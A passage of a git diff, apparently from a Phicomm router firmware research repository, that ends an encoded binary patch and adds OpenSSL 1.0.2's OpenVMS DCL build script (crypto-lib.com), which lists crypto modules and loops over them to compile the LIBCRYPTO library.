zSAcU|Ur)$S(;h~<w1}LM=j69Am+Om+M3{#JaJ`+mz9v{>bxW)&bu-CaOc|1*?;+F~
zrH>q28AJV*D*VAJ{E;gB+g14ARN>DMho9n~Wc-KB4^xeTb&T>BeIO6}D8id4RPgV3
zxXf{{0Dr>bw=geSe1bXbqlo@Tn4j`+nPX1{`d_v9Pne%!F4yU|iC4=1$1Hz7)hJ^3
zQaUf7|6=BHAH1G9UI9({oy^xVm-}Ic`4=qtS>|}}LGjkHQh!anlAlkq{MT4s*6+P^
z>8T|D1D5|L%gdSbZ_MSMDrew3%>Ul<a~WOokca0jzMA=q%yI2USx3B*KO0&8G|S8R
z)LTV<pbEd8_1r-IqR8>h5?`s#mc+KyhgcrR2Su(34>KQRuJ6+{o~x42?~=Ue)Qb4)
z@2YUzn~=B9P>mw@`d64=#r#TdSp7ToE9rlY<sFvS&j2*%9p=4!Dc1K};w#91*u9+t
zJ;VCfFn^i#=w|^MyRk~Vkt)2u3g5;0f64yn`#b61$NY9qfSg}<G5-?t)$Hf}#8=Y&
zNJ_b7yrjl5nJ8Y?aw<Q9H@s9L8mITcp%}ftfk*Ksn8Pa_i?v0%I~0Aj<7*wh*5m71
z)xF~n`}(&<>7_B6PTr}dQwbH_64}-jj6}Ef^z01xNBe_ak#JPyNH58x3!|fW`;KM`
z`KW%)R$T)<(Of>8DA0T1KH|9%Q9PVYCZ(M&jIle0RetS^#wm_Gy<18c6-0DopCph-
zk`v>TOO)g&y8pqBDN@mnDNxN0vWUs_j=jVOjM1yO9$zvD<x3`R>kIeNmIm!Or1FwN
z2v*h7@9YQ%Lt8^pNKvwrS=uJyJT4mJ?T?CMc7Dqf5kS?!cp;ljrt>O_1(6;{Ffr`9
zEHM$MtpnSocxG}58;PA;L$GYFaGsASD`4-8pb_kZWT-M$l0LF}mjr9MFoxB-KQ>xO
zs&cYp>(|9&`s`Z5`pP7pDUfAyfEK*W%#DoSIZS&+qiX+fCQJKE!<3C&o=(YVd}Ln~
z+fQZL6n3Tdr{ZMS+qVj(k}5VdPCG*EEj*Pr;+N&?dCNkw4ta2KtT<Jd4DhZIg*{Ar
zK?t9M5IeH4%5LWJ32cI~wXx(Fj-JHZyRElxYj-r8)W<rRkn5FP-*8*OwX2&4KFu{4
z?v)>vyn^Rx6p;^k-SRxh<5@!FBRmd%g~4|*xAnvg`Og^gIfMHR{&nV}XBGGV%Hk3y
zo-a{E9)6+V`4UCA=#l%ZaMAN4PrNKIdVXQ?Yq`H*@oTvM8?G_`v-FX?(JfIIu`7Bm
zvbgBMb~=j4U+Q&Lr^V&DXL}Wn9cdKNBl5BzB0S)UscDvn|JYCz|DUz=i2TVaT=qh2
z{l75uZ!+}Do(Sae93pmC08kM<A+M`eGKZg==_B%ZZbm_cV=nw^gJX{9`JBP=Q<lhg
z8~pRcrSw`{<X<#+7YPf;`z;D=;#?H|sX9=P!x!P3m}45AEroyHkPjL>WbiEpj~aSl
zTb{q~Fyyxy^7k9^ml*sZgJaJ?{P_z*PmjSLGvr}c&aZ#4xUB!5S^QHp2c-^^sUQ!g
z-3I2U9QueqjfOm$e?T9UOALAQx_5;ok2Qp{(cq?CJg1_dGVR`6MIO(iD7O4)75O_1
z`3TLExMr%zf7Re<Vy&Y*X6W%#U-Ud<aPxY8%FtuR`>%$)8SkrxJercX1w;NO!|vHC
z@-_T^fMN5#&}8slL(f&r?e*|kL*DeWvx<C=!C{--Q@w^BzhO6T$@6kmUp2Uyw?8-Z
znErgjkcUml+mi-2^~m2AL{^UDj|_PkBX#O$hF!eNi~Mh@$k*|E5_Fh({xowt&sP}o
zW?bv5$Zs?_Y~X{EH@F$^WEK4f4S6%(2Mu}TQsVu~D)NsR@@9UH8}g<<-#6sVcx(85
z5&3~Xa=*TYIhZN`g(^I0=;<>2|AujY#5Gdl`h6Ir0{y1{VZ%>9jfp%pb%DBz=o9t2
z<sC!eDdzI-FMNzSa)Khf;B}RsYvFfszs2H*xZiGZ>@T8h@T#(YdH(CP_@mrMZc)VU
zx4dro_b=h!VLr&U@W18$9*aNA{Sk{F=YGcGFLHmv;{U?^gBE{{`}bR1o+A%i{9W!p
zZ1E4d|ER@l5FizaTjKRGKjICS^CtU>Pg&g0@<ofcF+XW>c}{)F;@vEN%HloD=PlmP
z{B?^DGCyPSJ<Q*?_+I8ZP#QxQ>;Fs48@LuO&%xM7MiHLlezV1~PmJQX_?NlgV(~xb
ze!InG|7(NA|BU;c7XLc;{o1<sT*Q|IO*$=pANTt$F6(T>;*W6ufW>7!$voJ^=LwdR
z^G|q@xvVSUKV&Yoa9JPoJTClI?*H22vJT{UiM;He<8MzW!eyOHo`uW)dBl=m%l$nT
zm;Lj+#by5-zY~~tWuN?r#brPIxW#2Z{FKFIKl}}g%YL{H)QI;*mTN|!2A6&B%@&t^
z>^_Ujes#j)vR{4B;<C^Dki})6`H013KlzNsWq<fG<GlbPvY&jL#by8bfW>7W_@u>U
zANc1MmwjN>mYW>Q$A+lRXT5qvTC~{`Ys)7m@~Tb$EvaoNms4%oadaTw(MG$xT1XRW
z(O?@kXhu~V{a0rUdvtB-@qDt4{t~iQ?@n=lZ@SQy$&P2}zekg-BRLWs&f+gc|0~5$
zTCg<uaiOfUlUp<VJR$?UjHIiu|4>h#&NA^D8Qz#^;2-dCt;O61mTTtvD(0Marb_*z
zWmg7l`*_ZRPJ8}KJikvSaxL}+cTfX5?LSG$e0lB?d9g2bnCIK}5AqLK@;kK5_e+E8
zPO2;AZ(@xnApaXc{&0-Mf63n<G5FF>AG4g~ykoD)EaJD+F&dP%Dff>2@M^*evUd<e
zs`+#+OTW+a{bk}c#DBr~-3a#W`OUmB@w$~*d;TGsTPc5it)7KFJRkXkN|`VDt7Kcx
x<R4Z~@;burn!i_JJ`S_xqMm+|e*pX@oHL4@>y<QCY5oy@f%uv+7fpNqe*?A>_Co*w

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/crypto-lib.com b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/crypto-lib.com
new file mode 100644
index 0000000..1423cac
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/crypto-lib.com
@@ -0,0 +1,1537 @@
+$!
+$!  CRYPTO-LIB.COM
+$!  Written By:  Robert Byer
+$!               Vice-President
+$!               A-Com Computing, Inc.
+$!               byer@mail.all-net.net
+$!
+$!  Changes by Richard Levitte <richard@levitte.org>
+$!             Zoltan Arpadffy <arpadffy@polarhome.com>
+$!
+$!  This command files compiles and creates the "[.xxx.EXE.CRYPTO]LIBCRYPTO.OLB" 
+$!  library for OpenSSL.  The "xxx" denotes the machine architecture, ALPHA,
+$!  IA64 or VAX.
+$!
+$!  It was re-written so it would try to determine what "C" compiler to use 
+$!  or you can specify which "C" compiler to use.
+$!
+$!  Specify the following as P1 to build just that part or ALL to just
+$!  build everything.
+$!
+$!    	LIBRARY    To just compile the [.xxx.EXE.CRYPTO]LIBCRYPTO.OLB Library.
+$!    	APPS       To just compile the [.xxx.EXE.CRYPTO]*.EXE
+$!	ALL	   To do both LIBRARY and APPS
+$!
+$!  Specify DEBUG or NODEBUG as P2 to compile with or without debugger
+$!  information.
+$!
+$!  Specify which compiler at P3 to try to compile under.
+$!
+$!	VAXC	   For VAX C.
+$!	DECC	   For DEC C.
+$!	GNUC	   For GNU C.
+$!
+$!  If you don't specify a compiler, it will try to determine which
+$!  "C" compiler to use.
+$!
+$!  P4, if defined, sets a TCP/IP library to use, through one of the following
+$!  keywords:
+$!
+$!	UCX	   For UCX
+$!	TCPIP	   For TCPIP (post UCX)
+$!	SOCKETSHR  For SOCKETSHR+NETLIB
+$!
+$!  P5, if defined, sets a compiler thread NOT needed on OpenVMS 7.1 (and up)
+$!
+$!  P6, if defined, sets a choice of crypto methods to compile.
+$!  WARNING: this should only be done to recompile some part of an already
+$!  fully compiled library.
+$!
+$!  P7, if defined, specifies the C pointer size.  Ignored on VAX.
+$!      ("64=ARGV" gives more efficient code with HP C V7.3 or newer.)
+$!      Supported values are:
+$!
+$!      ""       Compile with default (/NOPOINTER_SIZE)
+$!      32       Compile with /POINTER_SIZE=32 (SHORT)
+$!      64       Compile with /POINTER_SIZE=64[=ARGV] (LONG[=ARGV]).
+$!               (Automatically select ARGV if compiler supports it.)
+$!      64=      Compile with /POINTER_SIZE=64 (LONG).
+$!      64=ARGV  Compile with /POINTER_SIZE=64=ARGV (LONG=ARGV).
+$!
+$!  P8, if defined, specifies a directory where ZLIB files (zlib.h,
+$!  libz.olb) may be found.  Optionally, a non-default object library
+$!  name may be included ("dev:[dir]libz_64.olb", for example).
+$!
+$!
+$! Announce/identify.
+$!
+$ proc = f$environment( "procedure")
+$ write sys$output "@@@ "+ -
+   f$parse( proc, , , "name")+ f$parse( proc, , , "type")
+$!
+$! Define A TCP/IP Library That We Will Need To Link To.
+$! (That Is, If We Need To Link To One.)
+$!
+$ TCPIP_LIB = ""
+$ ZLIB_LIB = ""
+$!
+$! Check Which Architecture We Are Using.
+$!
+$ IF (F$GETSYI("CPU").LT.128)
+$ THEN
+$!
+$!  The Architecture Is VAX
+$!
+$   ARCH = "VAX"
+$!
+$! Else...
+$!
+$ ELSE
+$!
+$!  The Architecture Is Alpha, IA64 or whatever comes in the future.
+$!
+$   ARCH = F$EDIT( F$GETSYI( "ARCH_NAME"), "UPCASE")
+$   IF (ARCH .EQS. "") THEN ARCH = "UNK"
+$!
+$! End The Architecture Check.
+$!
+$ ENDIF
+$!
+$ ARCHD = ARCH
+$ LIB32 = "32"
+$ OPT_FILE = ""
+$ POINTER_SIZE = ""
+$!
+$! Define The Different Encryption Types.
+$! NOTE: Some might think this list ugly.  However, it's made this way to
+$! reflect the SDIRS variable in [-]Makefile.org as closely as possible,
+$! thereby making it fairly easy to verify that the lists are the same.
+$!
+$ ET_WHIRLPOOL = "WHRLPOOL"
+$ IF ARCH .EQS. "VAX" THEN ET_WHIRLPOOL = ""
+$ ENCRYPT_TYPES = "Basic,"+ -
+		  "OBJECTS,"+ -
+		  "MD4,MD5,SHA,MDC2,HMAC,RIPEMD,"+ET_WHIRLPOOL+","+ -
+		  "DES,AES,RC2,RC4,IDEA,BF,CAST,CAMELLIA,SEED,MODES,"+ -
+		  "BN,EC,RSA,DSA,ECDSA,DH,ECDH,DSO,ENGINE,"+ -
+		  "BUFFER,BIO,STACK,LHASH,RAND,ERR,"+ -
+		  "EVP,EVP_2,EVP_3,ASN1,ASN1_2,PEM,X509,X509V3,"+ -
+		  "CONF,TXT_DB,PKCS7,PKCS12,COMP,OCSP,UI,KRB5,"+ -
+		  "CMS,PQUEUE,TS,JPAKE,SRP,STORE,CMAC"
+$!
+$! Check To Make Sure We Have Valid Command Line Parameters.
+$!
+$ GOSUB CHECK_OPTIONS
+$!
+$! Define The OBJ and EXE Directories.
+$!
+$ OBJ_DIR := SYS$DISK:[-.'ARCHD'.OBJ.CRYPTO]
+$ EXE_DIR := SYS$DISK:[-.'ARCHD'.EXE.CRYPTO]
+$!
+$! Specify the destination directory in any /MAP option.
+$!
+$ if (LINKMAP .eqs. "MAP")
+$ then
+$   LINKMAP = LINKMAP+ "=''EXE_DIR'"
+$ endif
+$!
+$! Add the location prefix to the linker options file name.
+$!
+$ if (OPT_FILE .nes. "")
+$ then
+$   OPT_FILE = EXE_DIR+ OPT_FILE
+$ endif
+$!
+$! Initialise logical names and such
+$!
+$ GOSUB INITIALISE
+$!
+$! Tell The User What Kind of Machine We Run On.
+$!
+$ WRITE SYS$OUTPUT "Host system architecture: ''ARCHD'"
+$!
+$!
+$! Check To See If The Architecture Specific OBJ Directory Exists.
+$!
+$ IF (F$PARSE(OBJ_DIR).EQS."")
+$ THEN
+$!
+$!  It Dosen't Exist, So Create It.
+$!
+$   CREATE/DIR 'OBJ_DIR'
+$!
+$! End The Architecture Specific OBJ Directory Check.
+$!
+$ ENDIF
+$!
+$! Check To See If The Architecture Specific Directory Exists.
+$!
+$ IF (F$PARSE(EXE_DIR).EQS."")
+$ THEN
+$!
+$!  It Dosen't Exist, So Create It.
+$!
+$   CREATE/DIRECTORY 'EXE_DIR'
+$!
+$! End The Architecture Specific Directory Check.
+$!
+$ ENDIF
+$!
+$! Define The Library Name.
+$!
+$ LIB_NAME := 'EXE_DIR'SSL_LIBCRYPTO'LIB32'.OLB
+$!
+$! Define The CRYPTO-LIB We Are To Use.
+$!
+$ CRYPTO_LIB := 'EXE_DIR'SSL_LIBCRYPTO'LIB32'.OLB
+$!
+$! Check To See If We Already Have A "[.xxx.EXE.CRYPTO]LIBCRYPTO.OLB" Library...
+$!
+$ IF (F$SEARCH(LIB_NAME).EQS."")
+$ THEN
+$!
+$! Guess Not, Create The Library.
+$!
+$   LIBRARY/CREATE/OBJECT 'LIB_NAME'
+$!
+$! End The Library Check.
+$!
+$ ENDIF
+$!
+$! Build our options file for the application
+$!
+$ GOSUB CHECK_OPT_FILE
+$!
+$! Define The Different Encryption "library" Strings.
+$!
+$!!! Test apps disabled, as they aren't supported at all,
+$!!! not even in the unix build
+$!!! APPS_DES = "DES/DES,CBC3_ENC"
+$!!! APPS_PKCS7 = "ENC/ENC;DEC/DEC;SIGN/SIGN;VERIFY/VERIFY,EXAMPLE"
+$
+$! These variables are ordered as the SDIRS variable from the top Makefile.org
+$! The contents of these variables are copied from the LIBOBJ variable in the
+$! corresponding Makefile from each corresponding subdirectory, with .o stripped
+$! and spaces replaced with commas.
+$ LIB_ = "cryptlib,mem,mem_dbg,cversion,ex_data,cpt_err,ebcdic,"+ -
+	"uid,o_time,o_str,o_dir,o_fips,o_init,fips_ers,mem_clr"
+$ LIB_OBJECTS = "o_names,obj_dat,obj_lib,obj_err,obj_xref"
+$ LIB_MD2 = "md2_dgst,md2_one"
+$ LIB_MD4 = "md4_dgst,md4_one"
+$ LIB_MD5 = "md5_dgst,md5_one"
+$ LIB_SHA = "sha_dgst,sha1dgst,sha_one,sha1_one,sha256,sha512"
+$ LIB_MDC2 = "mdc2dgst,mdc2_one"
+$ LIB_HMAC = "hmac,hm_ameth,hm_pmeth"
+$ LIB_RIPEMD = "rmd_dgst,rmd_one"
+$ LIB_WHRLPOOL = "wp_dgst,wp_block"
+$ LIB_DES = "set_key,ecb_enc,cbc_enc,"+ -
+	"ecb3_enc,cfb64enc,cfb64ede,cfb_enc,ofb64ede,"+ -
+	"enc_read,enc_writ,ofb64enc,"+ -
+	"ofb_enc,str2key,pcbc_enc,qud_cksm,rand_key,"+ -
+	"des_enc,fcrypt_b,"+ -
+	"fcrypt,xcbc_enc,rpc_enc,cbc_cksm,"+ -
+	"ede_cbcm_enc,des_old,des_old2,read2pwd"
+$ LIB_AES = "aes_misc,aes_ecb,aes_cfb,aes_ofb,aes_ctr,aes_ige,aes_wrap,"+ -
+	"aes_core,aes_cbc"
+$ LIB_RC2 = "rc2_ecb,rc2_skey,rc2_cbc,rc2cfb64,rc2ofb64"
+$ LIB_RC4 = "rc4_enc,rc4_skey,rc4_utl"
+$ LIB_RC5 = "rc5_skey,rc5_ecb,rc5_enc,rc5cfb64,rc5ofb64"
+$ LIB_IDEA = "i_cbc,i_cfb64,i_ofb64,i_ecb,i_skey"
+$ LIB_BF = "bf_skey,bf_ecb,bf_enc,bf_cfb64,bf_ofb64"
+$ LIB_CAST = "c_skey,c_ecb,c_enc,c_cfb64,c_ofb64"
+$ LIB_CAMELLIA = "cmll_ecb,cmll_ofb,cmll_cfb,cmll_ctr,"+ -
+	"cmll_utl,camellia,cmll_misc,cmll_cbc"
+$ LIB_SEED = "seed,seed_ecb,seed_cbc,seed_cfb,seed_ofb"
+$ LIB_MODES = "cbc128,ctr128,cts128,cfb128,ofb128,gcm128,"+ -
+       "ccm128,xts128,wrap128"
+$ LIB_BN_ASM = "[.asm]vms.mar,vms-helper"
+$ IF F$TRNLNM("OPENSSL_NO_ASM") .OR. ARCH .NES. "VAX" THEN -
+     LIB_BN_ASM = "bn_asm"
+$ LIB_BN = "bn_add,bn_div,bn_exp,bn_lib,bn_ctx,bn_mul,bn_mod,"+ -
+	"bn_print,bn_rand,bn_shift,bn_word,bn_blind,"+ -
+	"bn_kron,bn_sqrt,bn_gcd,bn_prime,bn_err,bn_sqr,"+LIB_BN_ASM+","+ -
+	"bn_recp,bn_mont,bn_mpi,bn_exp2,bn_gf2m,bn_nist,"+ -
+	"bn_depr,bn_const,bn_x931p"
+$ LIB_EC = "ec_lib,ecp_smpl,ecp_mont,ecp_nist,ec_cvt,ec_mult,"+ -
+	"ec_err,ec_curve,ec_check,ec_print,ec_asn1,ec_key,"+ -
+	"ec2_smpl,ec2_mult,ec_ameth,ec_pmeth,eck_prn,"+ -
+	"ecp_nistp224,ecp_nistp256,ecp_nistp521,ecp_nistputil,"+ -
+	"ecp_oct,ec2_oct,ec_oct"
+$ LIB_RSA = "rsa_eay,rsa_gen,rsa_lib,rsa_sign,rsa_saos,rsa_err,"+ -
+	"rsa_pk1,rsa_ssl,rsa_none,rsa_oaep,rsa_chk,rsa_null,"+ -
+	"rsa_pss,rsa_x931,rsa_asn1,rsa_depr,rsa_ameth,rsa_prn,"+ -
+	"rsa_pmeth,rsa_crpt"
+$ LIB_DSA = "dsa_gen,dsa_key,dsa_lib,dsa_asn1,dsa_vrf,dsa_sign,"+ -
+	"dsa_err,dsa_ossl,dsa_depr,dsa_ameth,dsa_pmeth,dsa_prn"
+$ LIB_ECDSA = "ecs_lib,ecs_asn1,ecs_ossl,ecs_sign,ecs_vrf,ecs_err"
+$ LIB_DH = "dh_asn1,dh_gen,dh_key,dh_lib,dh_check,dh_err,dh_depr,"+ -
+	"dh_ameth,dh_pmeth,dh_prn,dh_rfc5114,dh_kdf"
+$ LIB_ECDH = "ech_lib,ech_ossl,ech_key,ech_err,ech_kdf"
+$ LIB_DSO = "dso_dl,dso_dlfcn,dso_err,dso_lib,dso_null,"+ -
+	"dso_openssl,dso_win32,dso_vms,dso_beos"
+$ LIB_ENGINE = "eng_err,eng_lib,eng_list,eng_init,eng_ctrl,"+ -
+	"eng_table,eng_pkey,eng_fat,eng_all,"+ -
+	"tb_rsa,tb_dsa,tb_ecdsa,tb_dh,tb_ecdh,tb_rand,tb_store,"+ -
+	"tb_cipher,tb_digest,tb_pkmeth,tb_asnmth,"+ -
+	"eng_openssl,eng_cnf,eng_dyn,eng_cryptodev,"+ -
+	"eng_rdrand"
+$ LIB_BUFFER = "buffer,buf_str,buf_err"
+$ LIB_BIO = "bio_lib,bio_cb,bio_err,"+ -
+	"bss_mem,bss_null,bss_fd,"+ -
+	"bss_file,bss_sock,bss_conn,"+ -
+	"bf_null,bf_buff,b_print,b_dump,"+ -
+	"b_sock,bss_acpt,bf_nbio,bss_log,bss_bio,"+ -
+	"bss_dgram,"+ -
+	"bf_lbuf,bss_rtcp" ! The last two are VMS specific
+$ LIB_STACK = "stack"
+$ LIB_LHASH = "lhash,lh_stats"
+$ LIB_RAND = "md_rand,randfile,rand_lib,rand_err,rand_egd,"+ -
+	"rand_vms" ! The last one is VMS specific
+$ LIB_ERR = "err,err_all,err_prn"
+$ LIB_EVP = "encode,digest,evp_enc,evp_key,evp_acnf,evp_cnf,"+ -
+	"e_des,e_bf,e_idea,e_des3,e_camellia,"+ -
+	"e_rc4,e_aes,names,e_seed,"+ -
+	"e_xcbc_d,e_rc2,e_cast,e_rc5"
+$ LIB_EVP_2 = "m_null,m_md2,m_md4,m_md5,m_sha,m_sha1,m_wp," + -
+	"m_dss,m_dss1,m_mdc2,m_ripemd,m_ecdsa,"+ -
+	"p_open,p_seal,p_sign,p_verify,p_lib,p_enc,p_dec,"+ -
+	"bio_md,bio_b64,bio_enc,evp_err,e_null,"+ -
+	"c_all,c_allc,c_alld,evp_lib,bio_ok,"+-
+	"evp_pkey,evp_pbe,p5_crpt,p5_crpt2"
+$ LIB_EVP_3 = "e_old,pmeth_lib,pmeth_fn,pmeth_gn,m_sigver,"+ -
+	"e_aes_cbc_hmac_sha1,e_aes_cbc_hmac_sha256,e_rc4_hmac_md5"
+$ LIB_ASN1 = "a_object,a_bitstr,a_utctm,a_gentm,a_time,a_int,a_octet,"+ -
+	"a_print,a_type,a_set,a_dup,a_d2i_fp,a_i2d_fp,"+ -
+	"a_enum,a_utf8,a_sign,a_digest,a_verify,a_mbstr,a_strex,"+ -
+	"x_algor,x_val,x_pubkey,x_sig,x_req,x_attrib,x_bignum,"+ -
+	"x_long,x_name,x_x509,x_x509a,x_crl,x_info,x_spki,nsseq,"+ -
+	"x_nx509,d2i_pu,d2i_pr,i2d_pu,i2d_pr"
+$ LIB_ASN1_2 = "t_req,t_x509,t_x509a,t_crl,t_pkey,t_spki,t_bitst,"+ -
+	"tasn_new,tasn_fre,tasn_enc,tasn_dec,tasn_utl,tasn_typ,"+ -
+	"tasn_prn,ameth_lib,"+ -
+	"f_int,f_string,n_pkey,"+ -
+	"f_enum,x_pkey,a_bool,x_exten,bio_asn1,bio_ndef,asn_mime,"+ -
+	"asn1_gen,asn1_par,asn1_lib,asn1_err,a_bytes,a_strnid,"+ -
+	"evp_asn1,asn_pack,p5_pbe,p5_pbev2,p8_pkey,asn_moid"
+$ LIB_PEM = "pem_sign,pem_seal,pem_info,pem_lib,pem_all,pem_err,"+ -
+	"pem_x509,pem_xaux,pem_oth,pem_pk8,pem_pkey,pvkfmt"
+$ LIB_X509 = "x509_def,x509_d2,x509_r2x,x509_cmp,"+ -
+	"x509_obj,x509_req,x509spki,x509_vfy,"+ -
+	"x509_set,x509cset,x509rset,x509_err,"+ -
+	"x509name,x509_v3,x509_ext,x509_att,"+ -
+	"x509type,x509_lu,x_all,x509_txt,"+ -
+	"x509_trs,by_file,by_dir,x509_vpm"
+$ LIB_X509V3 = "v3_bcons,v3_bitst,v3_conf,v3_extku,v3_ia5,v3_lib,"+ -
+	"v3_prn,v3_utl,v3err,v3_genn,v3_alt,v3_skey,v3_akey,v3_pku,"+ -
+	"v3_int,v3_enum,v3_sxnet,v3_cpols,v3_crld,v3_purp,v3_info,"+ -
+	"v3_ocsp,v3_akeya,v3_pmaps,v3_pcons,v3_ncons,v3_pcia,v3_pci,"+ -
+	"pcy_cache,pcy_node,pcy_data,pcy_map,pcy_tree,pcy_lib,"+ -
+	"v3_asid,v3_addr,v3_scts"
+$ LIB_CONF = "conf_err,conf_lib,conf_api,conf_def,conf_mod,conf_mall,conf_sap"
+$ LIB_TXT_DB = "txt_db"
+$ LIB_PKCS7 = "pk7_asn1,pk7_lib,pkcs7err,pk7_doit,pk7_smime,pk7_attr,"+ -
+	"pk7_mime,bio_pk7"
+$ LIB_PKCS12 = "p12_add,p12_asn,p12_attr,p12_crpt,p12_crt,p12_decr,"+ -
+	"p12_init,p12_key,p12_kiss,p12_mutl,"+ -
+	"p12_utl,p12_npas,pk12err,p12_p8d,p12_p8e"
+$ LIB_COMP = "comp_lib,comp_err,"+ -
+	"c_rle,c_zlib"
+$ LIB_OCSP = "ocsp_asn,ocsp_ext,ocsp_ht,ocsp_lib,ocsp_cl,"+ -
+	"ocsp_srv,ocsp_prn,ocsp_vfy,ocsp_err"
+$ LIB_UI_COMPAT = ",ui_compat"
+$ LIB_UI = "ui_err,ui_lib,ui_openssl,ui_util"+LIB_UI_COMPAT
+$ LIB_KRB5 = "krb5_asn"
+$ LIB_CMS = "cms_lib,cms_asn1,cms_att,cms_io,cms_smime,cms_err,"+ -
+	"cms_sd,cms_dd,cms_cd,cms_env,cms_enc,cms_ess,"+ -
+       "cms_pwri,cms_kari"
+$ LIB_PQUEUE = "pqueue"
+$ LIB_TS = "ts_err,ts_req_utils,ts_req_print,ts_rsp_utils,ts_rsp_print,"+ -
+	"ts_rsp_sign,ts_rsp_verify,ts_verify_ctx,ts_lib,ts_conf,"+ -
+	"ts_asn1"
+$ LIB_JPAKE = "jpake,jpake_err"
+$ LIB_SRP = "srp_lib,srp_vfy"
+$ LIB_STORE = "str_err,str_lib,str_meth,str_mem"
+$ LIB_CMAC = "cmac,cm_ameth,cm_pmeth"
+$!
+$! Setup exceptional compilations
+$!
+$ CC3_SHOWN = 0
+$ CC4_SHOWN = 0
+$ CC5_SHOWN = 0
+$ CC6_SHOWN = 0
+$!
+$! The following lists must have leading and trailing commas, and no
+$! embedded spaces.  (They are scanned for ",name,".)
+$!
+$ ! Add definitions for no threads on OpenVMS 7.1 and higher.
+$ COMPILEWITH_CC3 = ",bss_rtcp,"
+$ ! Disable the DOLLARID warning.  Not needed with /STANDARD=RELAXED.
+$ COMPILEWITH_CC4 = "" !!! ",a_utctm,bss_log,o_time,o_dir,"
+$ ! Disable disjoint optimization on VAX with DECC.
+$ COMPILEWITH_CC5 = ",md2_dgst,md4_dgst,md5_dgst,mdc2dgst," + -
+                    "seed,sha_dgst,sha1dgst,rmd_dgst,bf_enc,"
+$ ! Disable the MIXLINKAGE warning.
+$ COMPILEWITH_CC6 = "" !!! ",enc_read,set_key,"
+$!
+$! Figure Out What Other Modules We Are To Build.
+$!
+$ BUILD_SET:
+$!
+$! Define A Module Counter.
+$!
+$ MODULE_COUNTER = 0
+$!
+$! Top Of The Loop.
+$!
+$ MODULE_NEXT:
+$!
+$! Extract The Module Name From The Encryption List.
+$!
+$ MODULE_NAME = F$EDIT(F$ELEMENT(MODULE_COUNTER,",",ENCRYPT_TYPES),"COLLAPSE")
+$ IF MODULE_NAME.EQS."Basic" THEN MODULE_NAME = ""
+$ MODULE_NAME1 = MODULE_NAME
+$!
+$! Check To See If We Are At The End Of The Module List.
+$!
+$ IF (MODULE_NAME.EQS.",") 
+$ THEN 
+$!
+$!  We Are At The End Of The Module List, Go To MODULE_DONE.
+$!
+$   GOTO MODULE_DONE
+$!
+$! End The Module List Check.
+$!
+$ ENDIF
+$!
+$! Increment The Moudle Counter.
+$!
+$ MODULE_COUNTER = MODULE_COUNTER + 1
+$!
+$! Create The Library and Apps Module Names.
+$!
+$ LIB_MODULE = "LIB_" + MODULE_NAME
+$ APPS_MODULE = "APPS_" + MODULE_NAME
+$ IF (F$EXTRACT(0,5,MODULE_NAME).EQS."ASN1_")
+$ THEN
+$   MODULE_NAME = "ASN1"
+$ ENDIF
+$ IF (F$EXTRACT(0,4,MODULE_NAME).EQS."EVP_")
+$ THEN
+$   MODULE_NAME = "EVP"
+$ ENDIF
+$!
+$! Set state (can be LIB and APPS)
+$!
+$ STATE = "LIB"
+$ IF BUILDALL .EQS. "APPS" THEN STATE = "APPS"
+$!
+$! Check if the library module name actually is defined
+$!
+$ IF F$TYPE('LIB_MODULE') .EQS. ""
+$ THEN
+$   WRITE SYS$ERROR ""
+$   WRITE SYS$ERROR "The module ",MODULE_NAME1," does not exist.  Continuing..."
+$   WRITE SYS$ERROR ""
+$   GOTO MODULE_NEXT
+$ ENDIF
+$!
+$! Top Of The Module Loop.
+$!
+$ MODULE_AGAIN:
+$!
+$! Tell The User What Module We Are Building.
+$!
+$ IF (MODULE_NAME1.NES."") 
+$ THEN
+$   IF STATE .EQS. "LIB"
+$   THEN
+$     WRITE SYS$OUTPUT "Compiling The ",MODULE_NAME1," Library Files. (",BUILDALL,",",STATE,")"
+$   ELSE IF F$TYPE('APPS_MODULE') .NES. ""
+$     THEN
+$       WRITE SYS$OUTPUT "Compiling The ",MODULE_NAME1," Applications. (",BUILDALL,",",STATE,")"
+$     ENDIF
+$   ENDIF
+$ ENDIF
+$!
+$!  Define A File Counter And Set It To "0".
+$!
+$ FILE_COUNTER = 0
+$ APPLICATION = ""
+$ APPLICATION_COUNTER = 0
+$!
+$! Top Of The File Loop.
+$!
+$ NEXT_FILE:
+$!
+$! Look in the LIB_MODULE is we're in state LIB
+$!
+$ IF STATE .EQS. "LIB"
+$ THEN
+$!
+$!   O.K, Extract The File Name From The File List.
+$!
+$   FILE_NAME = F$EDIT(F$ELEMENT(FILE_COUNTER,",",'LIB_MODULE'),"COLLAPSE")
+$!
+$!   else
+$!
+$ ELSE
+$   FILE_NAME = ","
+$!
+$   IF F$TYPE('APPS_MODULE') .NES. ""
+$   THEN
+$!
+$!     Extract The File Name From The File List.
+$!     This part is a bit more complicated.
+$!
+$     IF APPLICATION .EQS. ""
+$     THEN
+$       APPLICATION = F$ELEMENT(APPLICATION_COUNTER,";",'APPS_MODULE')
+$       APPLICATION_COUNTER = APPLICATION_COUNTER + 1
+$       APPLICATION_OBJECTS = F$ELEMENT(1,"/",APPLICATION)
+$       APPLICATION = F$ELEMENT(0,"/",APPLICATION)
+$       FILE_COUNTER = 0
+$     ENDIF
+$
+$!     WRITE SYS$OUTPUT "DEBUG: SHOW SYMBOL APPLICATION*"
+$!     SHOW SYMBOL APPLICATION*
+$!
+$     IF APPLICATION .NES. ";"
+$     THEN
+$       FILE_NAME = F$EDIT(F$ELEMENT(FILE_COUNTER,",",APPLICATION_OBJECTS),"COLLAPSE")
+$       IF FILE_NAME .EQS. ","
+$       THEN
+$         APPLICATION = ""
+$         GOTO NEXT_FILE
+$       ENDIF
+$     ENDIF
+$   ENDIF
+$ ENDIF
+$!
+$! Check To See If We Are At The End Of The File List.
+$!
+$ IF (FILE_NAME.EQS.",") 
+$ THEN 
+$!
+$!  We Are At The End Of The File List, Change State Or Goto FILE_DONE.
+$!
+$   IF STATE .EQS. "LIB" .AND. BUILDALL .NES. "LIBRARY"
+$   THEN
+$     STATE = "APPS"
+$     GOTO MODULE_AGAIN
+$   ELSE
+$     GOTO FILE_DONE
+$   ENDIF
+$!
+$! End The File List Check.
+$!
+$ ENDIF
+$!
+$! Increment The Counter.
+$!
+$ FILE_COUNTER = FILE_COUNTER + 1
+$!
+$! Create The Source File Name.
+$!
+$ TMP_FILE_NAME = F$ELEMENT(1,"]",FILE_NAME)
